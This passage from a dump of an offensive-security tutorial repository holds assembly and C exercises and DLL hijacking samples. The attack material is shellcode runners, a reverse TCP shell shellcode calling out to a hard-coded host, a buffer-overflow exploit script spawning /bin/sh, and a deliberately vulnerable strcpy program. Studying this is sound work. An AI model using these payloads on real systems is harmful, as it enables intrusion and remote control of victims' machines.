-o example1.o example1.asm 5 | ; gcc -static -m32 -o example1 example1.o 6 | ; 32-bit linux 7 | 8 | section .text 9 | global main 10 | 11 | main: 12 | push ebp 13 | mov ebp, esp 14 | mov eax, 123 15 | mov esp, ebp 16 | pop ebp 17 | ret 18 | 19 | section .data 20 | -------------------------------------------------------------------------------- /2021-10-08-malware-analysis-2/example1.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main(void) { 4 | return 123; 5 | } 6 | -------------------------------------------------------------------------------- /2021-10-08-malware-analysis-2/example1.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-08-malware-analysis-2/example1.exe -------------------------------------------------------------------------------- /2021-10-08-malware-analysis-2/example1.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-08-malware-analysis-2/example1.o -------------------------------------------------------------------------------- /2021-10-08-malware-analysis-2/example2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-08-malware-analysis-2/example2 -------------------------------------------------------------------------------- /2021-10-08-malware-analysis-2/example2.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-08-malware-analysis-2/example2.o -------------------------------------------------------------------------------- /2021-10-08-malware-analysis-2/example3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-08-malware-analysis-2/example3 -------------------------------------------------------------------------------- /2021-10-08-malware-analysis-2/example3.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int addMe(int a, int b) { 5 | return 42 * a + b; 6 | } 7 | 8 | int main(void) { 9 | int c; 10 | c = addMe(3, 5); 11 | return 0; 12 | } 13 | -------------------------------------------------------------------------------- /2021-10-08-malware-analysis-2/example3.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-08-malware-analysis-2/example3.o -------------------------------------------------------------------------------- /2021-10-08-malware-analysis-2/hello: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-08-malware-analysis-2/hello -------------------------------------------------------------------------------- /2021-10-08-malware-analysis-2/hello.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main(void) { 4 | puts ("hello world"); 5 | } 6 | 7 | -------------------------------------------------------------------------------- /2021-10-08-malware-analysis-2/hello.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-08-malware-analysis-2/hello.o -------------------------------------------------------------------------------- /2021-10-08-malware-analysis-2/hello2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-08-malware-analysis-2/hello2 -------------------------------------------------------------------------------- /2021-10-08-malware-analysis-2/hello2.asm: -------------------------------------------------------------------------------- 1 | ; hello.asm: writes "hello world" to the console by using C lib. 2 | ; author: @cocomelonc 3 | ; run: 4 | ; nasm -f elf32 -o hello2.o hello2.asm 5 | ; gcc -static -m32 -o hello2 hello2.o && ./hello2 6 | ; 32-bit linux 7 | 8 | section .text 9 | global main 10 | extern puts 11 | 12 | main: ; called by C lib startup code 13 | push msg ; address of string to output 14 | call puts ; puts (msg) 15 | add esp, 4 ; update stack pointer (1 argument 4 byte) 16 | xor eax, eax ; a faster way of setting eax to zero 17 | ret ; return from main back into C library wrapper 18 | 19 | msg: db "hello world", 0 ; note strings must be terminated with 0 in C 20 | -------------------------------------------------------------------------------- /2021-10-08-malware-analysis-2/hello2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-08-malware-analysis-2/hello2.exe -------------------------------------------------------------------------------- /2021-10-08-malware-analysis-2/hello2.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-08-malware-analysis-2/hello2.o -------------------------------------------------------------------------------- /2021-10-08-malware-analysis-2/hello3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-08-malware-analysis-2/hello3 -------------------------------------------------------------------------------- /2021-10-08-malware-analysis-2/hello3.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-08-malware-analysis-2/hello3.exe -------------------------------------------------------------------------------- /2021-10-08-malware-analysis-2/hello3.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-08-malware-analysis-2/hello3.o -------------------------------------------------------------------------------- /2021-10-08-malware-analysis-2/hello64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-08-malware-analysis-2/hello64 -------------------------------------------------------------------------------- /2021-10-08-malware-analysis-2/hello64.asm: -------------------------------------------------------------------------------- 1 | ; hello.asm: writes "hello world" to the console using only system calls. 2 | ; author: @cocomelonc 3 | ; run: 4 | ; nasm -f elf64 -o hello.o hello.asm 5 | ; ld -o hello hello.o && ./hello 6 | ; 64-bit linux 7 | 8 | section .text 9 | global _start 10 | 11 | _start: 12 | mov rax, 1 ; system call for write 13 | mov rdi, 1 ; file handle 1 is stdout 14 | mov rsi, msg ; address of string to output 15 | mov rdx, 12 ; number of bytes 16 | syscall 17 | 18 | _exit: 19 | mov rax, 60 ; sys_exit system call 20 | mov rdi, 219 ; exit code 0 successfull exec 21 | syscall 22 | 23 | section .data 24 | msg: db "hello world", 10 ; note the newline at the end 25 | -------------------------------------------------------------------------------- /2021-10-08-malware-analysis-2/hello64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-08-malware-analysis-2/hello64.o -------------------------------------------------------------------------------- /2021-10-08-malware-analysis-2/peda-session-example1.txt: -------------------------------------------------------------------------------- 1 | break main 2 | 3 | -------------------------------------------------------------------------------- /2021-10-08-malware-analysis-2/peda-session-example2.txt: -------------------------------------------------------------------------------- 1 | break main 2 | 3 | -------------------------------------------------------------------------------- /2021-10-08-malware-analysis-2/peda-session-example3.txt: -------------------------------------------------------------------------------- 1 | break main 2 | 3 | -------------------------------------------------------------------------------- /2021-10-08-malware-analysis-2/peda-session-hello.txt: -------------------------------------------------------------------------------- 1 | break _start 2 | 3 | -------------------------------------------------------------------------------- /2021-10-08-malware-analysis-2/peda-session-hello2.txt: -------------------------------------------------------------------------------- 1 | break main 2 | 3 | -------------------------------------------------------------------------------- /2021-10-08-malware-analysis-2/peda-session-hello3.txt: -------------------------------------------------------------------------------- 1 | break main 2 | 3 | -------------------------------------------------------------------------------- /2021-10-08-malware-analysis-2/peda-session-hello64.txt: -------------------------------------------------------------------------------- 1 | break _start 2 | 3 | -------------------------------------------------------------------------------- /2021-10-09-linux-shellcoding-1/README.md: -------------------------------------------------------------------------------- 1 | # Linux shellcoding. Examples 2 | 3 | Linux shellcoding. Examples: 4 | * normal exit 5 | * spawn linux shell 6 | 7 | [https://cocomelonc.github.io/tutorial/2021/10/09/linux-shellcoding-1.html](https://cocomelonc.github.io/tutorial/2021/10/09/linux-shellcoding-1.html) 8 | -------------------------------------------------------------------------------- /2021-10-09-linux-shellcoding-1/example1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-09-linux-shellcoding-1/example1 -------------------------------------------------------------------------------- /2021-10-09-linux-shellcoding-1/example1.asm: -------------------------------------------------------------------------------- 1 | ; just normal exit 2 | ; author @cocomelonc 3 | ; nasm -f elf32 -o example1.o example1.asm 4 | ; ld -m elf_i386 -o example1 example1.o && ./example1 5 | ; 32-bit linux 6 | 7 | section .data 8 | 9 | section .bss 10 | 11 | section .text 12 | global _start ; must be declared for linker 13 | 14 | ; normal exit 15 | _start: ; linker entry point 16 | xor eax, eax ; zero out eax 17 | mov al, 1 ; sys_exit system call (mov eax, 1) with remove null bytes 18 | int 0x80 ; call sys_exit 19 | -------------------------------------------------------------------------------- /2021-10-09-linux-shellcoding-1/example1.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-09-linux-shellcoding-1/example1.o -------------------------------------------------------------------------------- /2021-10-09-linux-shellcoding-1/example2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-09-linux-shellcoding-1/example2 -------------------------------------------------------------------------------- /2021-10-09-linux-shellcoding-1/example2.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-09-linux-shellcoding-1/example2.o -------------------------------------------------------------------------------- /2021-10-09-linux-shellcoding-1/example3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-09-linux-shellcoding-1/example3 -------------------------------------------------------------------------------- /2021-10-09-linux-shellcoding-1/example3.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-09-linux-shellcoding-1/example3.o -------------------------------------------------------------------------------- /2021-10-09-linux-shellcoding-1/exit0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-09-linux-shellcoding-1/exit0 -------------------------------------------------------------------------------- /2021-10-09-linux-shellcoding-1/exit0.c: -------------------------------------------------------------------------------- 1 | /* 2 | exit0.c - for demonstrating 3 | how libc wraps syscalls 4 | */ 5 | #include 6 | 7 | void main() { 8 | exit(0); 9 | } 10 | -------------------------------------------------------------------------------- /2021-10-09-linux-shellcoding-1/exit1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-09-linux-shellcoding-1/exit1 -------------------------------------------------------------------------------- /2021-10-09-linux-shellcoding-1/exit1.asm: -------------------------------------------------------------------------------- 1 | ; just normal exit 2 | ; author @cocomelonc 3 | ; nasm -f elf32 -o exit1.o exit1.asm 4 | ; ld -m elf_i386 -o exit1 exit1.o && ./exit1 5 | ; 32-bit linux 6 | 7 | section .data 8 | 9 | section .bss 10 | 11 | section .text 12 | global _start ; must be declared for linker 13 | 14 | ; normal exit 15 | _start: ; linker entry point 16 | mov eax, 0 ; zero out eax 17 | mov eax, 1 ; sys_exit system call 18 | int 0x80 ; call sys_exit 19 | -------------------------------------------------------------------------------- /2021-10-09-linux-shellcoding-1/exit1.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-09-linux-shellcoding-1/exit1.o -------------------------------------------------------------------------------- /2021-10-09-linux-shellcoding-1/exit2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-09-linux-shellcoding-1/exit2 -------------------------------------------------------------------------------- /2021-10-09-linux-shellcoding-1/exit2.asm: -------------------------------------------------------------------------------- 1 | ; just normal exit 2 | ; author @cocomelonc 3 | ; nasm -f elf32 -o exit2.o exit2.asm 4 | ; ld -m elf_i386 -o exit2 exit2.o && ./exit2 5 | ; 32-bit linux 6 | 7 | section .data 8 | 9 | section .bss 10 | 11 | section .text 12 | global _start ; must be declared for linker 13 | 14 | ; normal exit 15 | _start: ; linker entry point 16 | xor eax, eax ; zero out eax 17 | mov al, 1 ; sys_exit system call (mov eax, 1) with remove null bytes 18 | int 0x80 ; call sys_exit 19 | -------------------------------------------------------------------------------- /2021-10-09-linux-shellcoding-1/exit2.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-09-linux-shellcoding-1/exit2.o -------------------------------------------------------------------------------- /2021-10-09-linux-shellcoding-1/meow: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-09-linux-shellcoding-1/meow -------------------------------------------------------------------------------- /2021-10-09-linux-shellcoding-1/meow.c: -------------------------------------------------------------------------------- 1 | /* 2 | meow.c - demonstrate nullbytes 3 | */ 4 | #include 5 | int main(void) { 6 | printf ("=^..^= meow \x00 meow"); 7 | return 0; 8 | } 9 | -------------------------------------------------------------------------------- /2021-10-09-linux-shellcoding-1/peda-session-dash.txt: -------------------------------------------------------------------------------- 1 | break _start 2 | disable $bpnum 3 | 4 | -------------------------------------------------------------------------------- /2021-10-09-linux-shellcoding-1/peda-session-example1.txt: -------------------------------------------------------------------------------- 1 | break _start 2 | 3 | -------------------------------------------------------------------------------- /2021-10-09-linux-shellcoding-1/peda-session-example2.txt: -------------------------------------------------------------------------------- 1 | break _start 2 | 3 | -------------------------------------------------------------------------------- /2021-10-09-linux-shellcoding-1/peda-session-run.txt: -------------------------------------------------------------------------------- 1 | break main 2 | 3 | -------------------------------------------------------------------------------- /2021-10-09-linux-shellcoding-1/run: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-09-linux-shellcoding-1/run -------------------------------------------------------------------------------- /2021-10-09-linux-shellcoding-1/run.c: -------------------------------------------------------------------------------- 1 | /* 2 | run.c - a small skeleton program to run shellcode 3 | */ 4 | // bytecode here 5 | char code[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80"; 6 | 7 | int main(int argc, char **argv) { 8 | int (*func)(); // function pointer 9 | func = (int (*)()) code; // func points to our shellcode 10 | (int)(*func)(); // execute a function code[] 11 | // if our program returned 0 instead of 1, 12 | // so our shellcode worked 13 | return 1; 14 | } 15 | -------------------------------------------------------------------------------- /2021-10-09-linux-shellcoding-1/shell2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-09-linux-shellcoding-1/shell2 -------------------------------------------------------------------------------- /2021-10-09-linux-shellcoding-1/shell2.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 2 | #include 3 | #include 4 | 5 | char *shell[2]; 6 | int main(void) { 7 | shell[0] = "/bin/sh"; 8 | shell[1] = NULL; 9 | execve(shell[0], shell, NULL); 10 | exit(0); 11 | } 12 | -------------------------------------------------------------------------------- /2021-10-12-dll-hijacking-2/README.md: -------------------------------------------------------------------------------- 1 | # DLL hijacking with exported functions 2 | 3 | Classic DLL hijacking in windows with exported functions. Real world example: Microsoft Teams v.1.3.00.24758. 4 | 5 | [https://cocomelonc.github.io/pentest/2021/10/12/dll-hijacking-2.html](https://cocomelonc.github.io/pentest/2021/10/12/dll-hijacking-2.html) 6 | -------------------------------------------------------------------------------- /2021-10-12-dll-hijacking-2/cartoon.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-12-dll-hijacking-2/cartoon.exe -------------------------------------------------------------------------------- /2021-10-12-dll-hijacking-2/cscapi.def: -------------------------------------------------------------------------------- 1 | EXPORTS 2 | CscNetApiGetInterface=cscapi.CscNetApiGetInterface @1 3 | CscSearchApiGetInterface=cscapi.CscSearchApiGetInterface @2 4 | OfflineFilesEnable=cscapi.OfflineFilesEnable @3 5 | OfflineFilesGetShareCachingMode=cscapi.OfflineFilesGetShareCachingMode @4 6 | OfflineFilesQueryStatus=cscapi.OfflineFilesQueryStatus @5 7 | OfflineFilesQueryStatusEx=cscapi.OfflineFilesQueryStatusEx @6 8 | OfflineFilesStart=cscapi.OfflineFilesStart @7 9 | -------------------------------------------------------------------------------- /2021-10-12-dll-hijacking-2/cscapi.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-12-dll-hijacking-2/cscapi.dll -------------------------------------------------------------------------------- /2021-10-12-dll-hijacking-2/dll-def.py: -------------------------------------------------------------------------------- 1 | import pefile 2 | import sys 3 | import os.path 4 | 5 | dll = pefile.PE(sys.argv[1]) 6 | dll_basename = os.path.splitext(sys.argv[1])[0] 7 | 8 | try: 9 | with open(sys.argv[1].split("/")[-1].replace(".dll", ".def"), "w") as f: 10 | f.write("EXPORTS\n") 11 | for export in dll.DIRECTORY_ENTRY_EXPORT.symbols: 12 | if export.name: 13 | f.write('{}={}.{} @{}\n'.format(export.name.decode(), dll_basename, export.name.decode(), export.ordinal)) 14 | except: 15 | print ("failed to create .def file :(") 16 | else: 17 | print ("successfully create .def file :)") 18 | -------------------------------------------------------------------------------- /2021-10-12-dll-hijacking-2/evil.c: -------------------------------------------------------------------------------- 1 | /* 2 | evil.c - malicious DLL 3 | DLL hijacking with exported functions example 4 | author: @cocomelonc 5 | */ 6 | 7 | #include 8 | #pragma comment (lib, "user32.lib") 9 | 10 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { 11 | switch (ul_reason_for_call) { 12 | case DLL_PROCESS_ATTACH: 13 | MessageBox( 14 | NULL, 15 | "Meow-woof!", 16 | "=^..^=", 17 | MB_OK 18 | ); 19 | break; 20 | case DLL_PROCESS_DETACH: 21 | break; 22 | case DLL_THREAD_ATTACH: 23 | break; 24 | case DLL_THREAD_DETACH: 25 | break; 26 | } 27 | return TRUE; 28 | } 29 | -------------------------------------------------------------------------------- /2021-10-12-dll-hijacking-2/evil.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-12-dll-hijacking-2/evil.dll -------------------------------------------------------------------------------- /2021-10-12-dll-hijacking-2/evil2.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-12-dll-hijacking-2/evil2.dll -------------------------------------------------------------------------------- /2021-10-12-dll-hijacking-2/pet.def: -------------------------------------------------------------------------------- 1 | EXPORTS 2 | Bird=pet.Bird @1 3 | Cat=pet.Cat @2 4 | Mouse=pet.Mouse @3 5 | -------------------------------------------------------------------------------- /2021-10-12-dll-hijacking-2/pet.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-12-dll-hijacking-2/pet.dll -------------------------------------------------------------------------------- /2021-10-17-linux-shellcoding-2/.gdb_history: -------------------------------------------------------------------------------- 1 | b _start 2 | r 3 | si 4 | si 5 | si 6 | si 7 | si 8 | si 9 | si 10 | si 11 | si 12 | si 13 | si 14 | si 15 | si 16 | si 17 | si 18 | si 19 | si 20 | si 21 | si 22 | si 23 | si 24 | si 25 | si 26 | si 27 | si 28 | si 29 | si 30 | si 31 | si 32 | si 33 | si 34 | si 35 | si 36 | si 37 | si 38 | si 39 | si 40 | q 41 | b _start 42 | r 43 | si 44 | si 45 | si 46 | si 47 | si 48 | si 49 | si 50 | si 51 | si 52 | si 53 | si 54 | si 55 | si 56 | si 57 | si 58 | si 59 | si 60 | si 61 | si 62 | si 63 | si 64 | si 65 | si 66 | si 67 | si 68 | q 69 | -------------------------------------------------------------------------------- /2021-10-17-linux-shellcoding-2/README.md: -------------------------------------------------------------------------------- 1 | # Linux shellcoding - 2. Reverse TCP shell 2 | 3 | Linux shellcoding. Reverse TCP shell. 4 | -------------------------------------------------------------------------------- /2021-10-17-linux-shellcoding-2/peda-session-rev.txt: -------------------------------------------------------------------------------- 1 | break _start 2 | 3 | -------------------------------------------------------------------------------- /2021-10-17-linux-shellcoding-2/rev: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-17-linux-shellcoding-2/rev -------------------------------------------------------------------------------- /2021-10-17-linux-shellcoding-2/rev.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-17-linux-shellcoding-2/rev.o -------------------------------------------------------------------------------- /2021-10-17-linux-shellcoding-2/run: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-17-linux-shellcoding-2/run -------------------------------------------------------------------------------- /2021-10-17-linux-shellcoding-2/run.c: -------------------------------------------------------------------------------- 1 | /* 2 | run.c - a small skeleton program to run shellcode 3 | */ 4 | // bytecode here 5 | char code[] = "\x6a\x66\x58\x6a\x01\x5b\x31\xd2\x52\x53\x6a\x02\x89\xe1\xcd\x80\x92\xb0\x66\x68\x0a\x09\x01\x06\x66\x68\x11\x5c\x43\x66\x53\x89\xe1\x6a\x10\x51\x52\x89\xe1\x43\xcd\x80\x6a\x02\x59\x87\xda\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x41\x89\xca\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"; 6 | 7 | int main(int argc, char **argv) { 8 | int (*func)(); // function pointer 9 | func = (int (*)()) code; // func points to our shellcode 10 | (int)(*func)(); // execute a function code[] 11 | // if our program returned 0 instead of 1, 12 | // so our shellcode worked 13 | return 1; 14 | } 15 | -------------------------------------------------------------------------------- /2021-10-20-buffer-overflow-1/.gitignore: -------------------------------------------------------------------------------- 1 | /peda* 2 | -------------------------------------------------------------------------------- /2021-10-20-buffer-overflow-1/README.md: -------------------------------------------------------------------------------- 1 | # Buffer overflow - part 1. Linux stack smashing. 2 | 3 | Classic buffer overflow exploitation in linux. 4 | 5 | [https://cocomelonc.github.io/pwn/2021/10/19/buffer-overflow-1.html](https://cocomelonc.github.io/pwn/2021/10/19/buffer-overflow-1.html) 6 | -------------------------------------------------------------------------------- /2021-10-20-buffer-overflow-1/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # exploit.py - final payload with spawn /bin/sh shellcode 3 | shellcode = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80" 4 | padding = "\x41" * (272-64-len(shellcode)-4) 5 | nop = "\x90" * 64 6 | eip = "\xf4\xd3\xff\xff" 7 | print padding + nop + shellcode + eip 8 | -------------------------------------------------------------------------------- /2021-10-20-buffer-overflow-1/vuln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-20-buffer-overflow-1/vuln -------------------------------------------------------------------------------- /2021-10-20-buffer-overflow-1/vuln.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int overflow(char *input) { 6 | char buf[256]; 7 | strcpy(buf, input); 8 | return 1; 9 | } 10 | 11 | int main(int argc, char *argv[]) { 12 | overflow(argv[1]); 13 | printf("meow =^..^=\n"); 14 | return 1; 15 | } 16 | -------------------------------------------------------------------------------- /2021-10-26-windows-shellcoding-1/README.md: -------------------------------------------------------------------------------- 1 | # Windows x86 shellcoding part 1. 2 | 3 | Simplest C/C++ example. Run calc.exe and exit. 4 | 5 | [https://cocomelonc.github.io/tutorial/2021/10/27/windows-shellcoding-1.html](https://cocomelonc.github.io/tutorial/2021/10/27/windows-shellcoding-1.html) 6 | -------------------------------------------------------------------------------- /2021-10-26-windows-shellcoding-1/conv.py: -------------------------------------------------------------------------------- 1 | # convert string to reversed hex 2 | import sys 3 | 4 | input = sys.argv[1] 5 | chunks = [input[i:i+4] for i in range(0, len(input), 4)] 6 | for chunk in chunks[::-1]: 7 | print ("0x" + chunk[::-1].encode("utf-8").hex()) 8 | -------------------------------------------------------------------------------- /2021-10-26-windows-shellcoding-1/example1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-26-windows-shellcoding-1/example1 -------------------------------------------------------------------------------- /2021-10-26-windows-shellcoding-1/example1.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-26-windows-shellcoding-1/example1.o -------------------------------------------------------------------------------- /2021-10-26-windows-shellcoding-1/exit.c: -------------------------------------------------------------------------------- 1 | /* 2 | exit.c - run calc.exe and exit 3 | */ 4 | #include 5 | 6 | int main(void) { 7 | WinExec("calc.exe", 0); 8 | ExitProcess(0); 9 | } 10 | -------------------------------------------------------------------------------- /2021-10-26-windows-shellcoding-1/exit.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-26-windows-shellcoding-1/exit.exe -------------------------------------------------------------------------------- /2021-10-26-windows-shellcoding-1/getaddr.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-26-windows-shellcoding-1/getaddr.exe -------------------------------------------------------------------------------- /2021-10-26-windows-shellcoding-1/run.c: -------------------------------------------------------------------------------- 1 | /* 2 | run.c - a small skeleton program to run shellcode 3 | */ 4 | // bytecode here 5 | char code[] = "\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x89\xe0\x41\x51\x50\xbb\xfd\xe5\xf0\x76\xff\xd3\x31\xc0\x50\xb8\x4f\x21\xed\x76\xff\xe0"; 6 | 7 | int main(int argc, char **argv) { 8 | int (*func)(); // function pointer 9 | func = (int (*)()) code; // func points to our shellcode 10 | (int)(*func)(); // execute a function code[] 11 | // if our program returned 0 instead of 1, 12 | // so our shellcode worked 13 | return 1; 14 | } 15 | -------------------------------------------------------------------------------- /2021-10-26-windows-shellcoding-1/run.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-26-windows-shellcoding-1/run.exe -------------------------------------------------------------------------------- /2021-10-30-windows-shellcoding-2/README.md: -------------------------------------------------------------------------------- 1 | # Windows shellcoding - part 2 2 | 3 | Find `kernel32` address via assembly. Source code of post: 4 | 5 | [https://cocomelonc.github.io/tutorial/2021/10/30/windows-shellcoding-2.html](https://cocomelonc.github.io/tutorial/2021/10/30/windows-shellcoding-2.html) 6 | -------------------------------------------------------------------------------- /2021-10-30-windows-shellcoding-2/kernel.asm: -------------------------------------------------------------------------------- 1 | ; find kernel32 2 | ; author @cocomelonc 3 | ; nasm -f win32 -o kernel.o kernel.asm 4 | ; ld -m i386pe -o kernel.exe kernel.o 5 | ; 32-bit windows 6 | 7 | section .data 8 | 9 | section .bss 10 | 11 | section .text 12 | global _start ; must be declared for linker 13 | 14 | _start: 15 | xor ecx, ecx 16 | mov eax, [fs:ecx + 0x30] ; offset to the PEB struct 17 | mov eax, [eax + 0xc] ; offset to LDR within PEB 18 | mov eax, [eax + 0x14] ; offset to InMemoryOrderModuleList 19 | mov eax, [eax] ; kernel.exe address loaded in eax (1st) 20 | mov eax, [eax] ; ntdll.dll address loaded (2nd) 21 | mov eax, [eax + 0x10] ; kernel32.dll address loaded (3rd module) 22 | -------------------------------------------------------------------------------- /2021-10-30-windows-shellcoding-2/kernel.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-30-windows-shellcoding-2/kernel.exe -------------------------------------------------------------------------------- /2021-10-30-windows-shellcoding-2/kernel.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-30-windows-shellcoding-2/kernel.o -------------------------------------------------------------------------------- /2021-11-11-malware-injection-3/README.md: -------------------------------------------------------------------------------- 1 | # C++ Early Bird APC injection technique 2 | 3 | Simple Early Bird APC injection technique. C++ example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2021/11/11/malware-injection-3.html](https://cocomelonc.github.io/tutorial/2021/11/11/malware-injection-3.html) 6 | -------------------------------------------------------------------------------- /2021-11-11-malware-injection-3/evil.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-11-11-malware-injection-3/evil.exe -------------------------------------------------------------------------------- /2021-11-20-injection-4/README.md: -------------------------------------------------------------------------------- 1 | # APC code injection via NtTestAlert 2 | 3 | Simple APC code injection via undocumented NtTestAlert. C++ example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2021/11/20/malware-injection-4.html](https://cocomelonc.github.io/tutorial/2021/11/20/malware-injection-4.html) 6 | -------------------------------------------------------------------------------- /2021-11-20-injection-4/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-11-20-injection-4/hack.exe -------------------------------------------------------------------------------- /2021-11-22-malware-injection-5/README.md: -------------------------------------------------------------------------------- 1 | # APC code injection via alertable threads. 2 | 3 | Simple APC code 